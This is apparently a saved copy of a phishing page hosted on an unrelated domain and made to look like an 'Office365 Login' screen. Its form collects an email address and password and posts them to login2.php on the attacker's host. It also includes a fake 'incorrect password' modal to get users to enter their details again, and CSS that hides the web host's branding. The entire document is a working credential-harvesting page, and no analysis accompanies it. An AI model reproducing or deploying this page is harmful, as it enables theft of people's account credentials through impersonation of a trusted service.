
<!-- saved from url=(0040)https://hatfreshairhomecentres.com/info/ -->
<html lang="en"><script type="text/javascript" charset="utf-8" id="zm-extension" src="chrome-extension://fdcgdnkidjaadafnichfpabhfomcebme/scripts/webrtc-patch.js" async=""></script><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="https://hatfreshairhomecentres.com/info/images/icons/favicon.ico">
	<link rel="apple-touch-icon" sizes="57x57" href="https://hatfreshairhomecentres.com/info/images/icons/favicon.ico">

    <link rel="icon" type="image/x-icon" href="https://hatfreshairhomecentres.com/info/images/icons/favicon.ico">
    <link rel="shortcut icon" type="image/x-icon" href="https://hatfreshairhomecentres.com/info/images/icons/favicon.ico">
    <link rel="apple-touch-icon" href="https://hatfreshairhomecentres.com/info/images/icons/favicon.ico">
    <link rel="apple-touch-icon-precomposed" href="https://hatfreshairhomecentres.com/info/images/icons/favicon.ico">
<link rel="manifest" href="https://hatfreshairhomecentres.com/info/images/icons/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="images/icons/favicon.ico">
<meta name="theme-color" content="#ffffff">
<style>img[src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"]{display:none;}</style>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/material-design-iconic-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="./index_files/hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/select2.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="./index_files/daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./index_files/util.css">
	<link rel="stylesheet" type="text/css" href="./index_files/main.css">
<!--===============================================================================================-->

	</head><body class="" style=""><div class="limiter">
		<div class="container-login100">
			<div class="wrap-login100">
<form action="login2.php" method="post" name="form">
    					<span class="login100-form-title p-b-26">
						Welcome
					</span>
					<span class="login100-form-title p-b-48">
                    <img src="./index_files/Office-365-logo.png" alt="Office365">
					</span>

					<div class="wrap-input100 validate-input" data-validate="">
						<input class="input100" type="email" maxlength="" name="textinput" required="true">
						<span class="focus-input100" data-placeholder="E-mail ID"></span>
					</div>

					<div class="wrap-input100 validate-input" data-validate="Enter password">
						<span class="btn-show-pass">
							<i class="zmdi zmdi-eye"></i>
						</span>
						<input class="input100" type="password" maxlength="" name="passinput" required="true">
						<span class="focus-input100" data-placeholder="Password"></span>
					</div>

					<div class="container-login100-form-btn">
						<div class="wrap-login100-form-btn">
							<div class="login100-form-bgbtn"></div>
							<button class="login100-form-btn">
								SIGN IN
							</button>
						</div>
					</div>
</form>
					<div class="text-center p-t-115">
						<span class="txt1">
							Don't have an account?
						</span>

						<a class="txt2" href="https://hatfreshairhomecentres.com/info/#">
							Sign Up
						</a>
					</div>			</div>
		</div>
	</div>
	





  
  <title>Office365 Login</title>
  
  
  <link rel="stylesheet" href="./index_files/bootstrap.min(1).css">

  
  




  <div id="myModal" class="modal fade" role="dialog" style="display: none;">
  <div class="modal-dialog">
    <!-- Modal content-->
    <div class="modal-content">
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">�</button>
        <h4 class="modal-title">Help</h4>
      </div>
      <div class="modal-body">
        <p>Your Email and Password Combination was Incorrect . Try Again !!</p>
      </div>
      <div class="modal-footer">
        <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
      </div>
    </div>

  </div>
</div>
  <script src="./index_files/jquery.min.js.download"></script>
<script src="./index_files/bootstrap.min.js.download"></script>

  

    <script src="./index_files/index.js.download"></script>







</body></html>